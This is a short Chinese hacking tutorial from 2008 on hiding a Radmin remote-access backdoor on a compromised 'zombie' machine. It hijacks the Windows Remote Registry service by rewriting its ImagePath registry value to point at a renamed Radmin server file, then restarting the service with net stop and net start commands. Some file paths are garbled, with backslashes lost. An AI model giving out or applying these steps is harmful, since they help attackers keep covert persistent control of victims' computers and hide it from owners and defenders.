用已知服务来隐藏我们自己的服务
点击次数:21 次 发布日期:2008-11-29 18:07:20 作者:源代码网
|
源代码网推荐
_kai@163.com">作者:yin_kai@163.com
以下就拿我们都熟悉的radmin做演示,其他类似!
例如:
Remote Registry服务,他的作用是允许远程注册表*作。
(为了肉鸡的安全,我们把这个服务修改为我们的后门radmin服务)
他的服务执行文件是:%SystemRoot%system32
egsvc.exe
他在注册表里的地址是:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteRegistry
修改右边的字传值ImagePath,把:
%SystemRoot%system32
egsvc.exe
修改为我们的服务程序:
"%SystemRoot%system32
egsvc .exe" /service
(呵呵,我把r_server.exe该为了regsvc .exe可惜不能覆盖原文件,注意空格)
好了,把你的radmin的信息注册表的导入,然后:
net stop RemoteRegistry
net start RemoteRegistry
OK!
源代码网整理以下 |
源代码网供稿.
